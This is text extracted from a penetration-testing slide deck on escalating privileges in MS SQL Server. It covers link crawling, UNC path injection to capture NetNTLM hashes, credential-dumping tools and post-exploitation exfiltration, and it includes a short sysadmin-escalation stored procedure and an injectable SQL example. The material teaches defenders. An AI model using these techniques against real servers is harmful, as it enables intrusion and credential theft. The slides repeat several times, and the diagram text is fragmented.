Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
